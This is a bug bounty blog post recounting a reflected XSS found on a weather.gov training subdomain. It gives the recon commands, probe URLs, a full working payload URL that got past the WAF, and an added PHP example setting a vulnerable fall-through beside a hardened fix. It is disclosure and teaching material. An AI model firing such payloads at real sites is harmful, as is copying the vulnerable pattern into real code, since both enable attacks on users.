Bypassed the Amazon CloudFront Logic and got XSS at the National Weather Agency of the U.S.
Har Har Mahadev🔱. This is Prince Roy, a security researcher also known as Royzsec. Back again with another blog about how I was able to bypass the Amazon CloudFront firewall's logic and get XSS [cross-site scripting]. Are you guys excited to know how I did it?
So, at first, I collected all the live subdomains of weather.gov via Subfinder and HTTPX (the -all flag tells Subfinder to query all of its sources; -mc 200 keeps only hosts answering with HTTP 200):
subfinder -d weather.gov -all | httpx -mc 200 | tee weather_live.txt
I barely remember it, but I think I found this XSS on the 9th or 10th subdomain. I lost that source code; otherwise, I could explain very easily what the logical error in their CloudFront setup was.
The domain was training.weather.gov, and I found a GET-based reflected XSS on this page. Reading the source, they just used a loop that displays the PCU pages numbered 1–6. When I put:
https://training.weather.gov/pds/climate/index.php?unit=7
I found nothing on that page.
Then I tried to find a SQL injection, but that didn't work, because they are using Amazon CloudFront in front of the site.
Moreover, I also tried:
https://training.weather.gov/pds/climate/index.php?unit=1%22%3EHello
https://training.weather.gov/pds/climate/index.php?unit=2%22%3EHello
https://training.weather.gov/pds/climate/index.php?unit=6%22%3EHello
https://training.weather.gov/pds/climate/index.php?unit=7%22%3EHello
Up to ?unit=6, the request was blocked by Amazon CloudFront. But whenever I put unit=7, it bypassed that logic and the input was reflected on the screen.
I was shocked to see that, because it was unexpected: it was just a logical error. Then I put in the XSS payload, and guess what?
https://training.weather.gov/pds/climate/index.php?unit=7%27%22%3E%3CSvg%20Only=1%20OnLoad=confirm(atob(%22WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgUm95elNlYw==%22))%3E&tab=FUZZ
Boom! Got XSS. It was just a logical error: the developer made a mistake in the logic that retrieves the data from the database, so a unit number outside the expected range fell through to a code path that echoed the raw parameter. After 4 days they accepted my report as valid.
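To illustrate the kind of fall-through described above, here is an added example (my own hypothetical reconstruction, not the site's actual code, which was lost): a handler that only knows units 1–6 and reflects anything else unencoded, beside a hardened version that validates the parameter server-side and HTML-encodes every echoed value instead of relying on the edge WAF. The $units table and function names are assumptions.

```php
<?php
// Hypothetical reconstruction (assumption, not weather.gov's code): a page
// that shows one of six training units selected by ?unit=N.
$units = [1 => 'Unit 1', 2 => 'Unit 2', 3 => 'Unit 3',
          4 => 'Unit 4', 5 => 'Unit 5', 6 => 'Unit 6'];

// Vulnerable pattern: the loop only covers units 1-6; any other value falls
// through to a "not found" message that echoes the raw parameter into HTML.
function render_unit_vulnerable(array $units, string $unit): string {
    foreach ($units as $id => $title) {
        if ((string)$id === $unit) {
            return "<h1>$title</h1>";
        }
    }
    // Unvalidated reflection: $unit reaches the page unencoded.
    return "<p>Unit $unit not found</p>";
}

// Hardened version: accept only a digit string that maps to a known unit,
// and encode anything that is echoed back, including the error path.
function render_unit_safe(array $units, string $unit): string {
    $enc = fn(string $s): string =>
        htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');

    if (!ctype_digit($unit) || !isset($units[(int)$unit])) {
        http_response_code(404);
        return '<p>Unit ' . $enc($unit) . ' not found</p>';
    }
    return '<h1>' . $enc($units[(int)$unit]) . '</h1>';
}

$unit = $_GET['unit'] ?? '1';
echo render_unit_safe($units, $unit);
```

The fix belongs in the application: a WAF in front of the origin is a second layer, and as this report shows, a single code path it does not cover is enough to expose the underlying reflection.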
Finally, thanks for reading my small blog. If you like this, please share it with your friends and press the clap button for me, which inspires me a lot.
Please follow my social media platforms:
LinkedIn: https://www.linkedin.com/in/prince-roy-4b9a75187/
GitHub: https://github.com/royzsec
Twitter: https://twitter.com/royzsec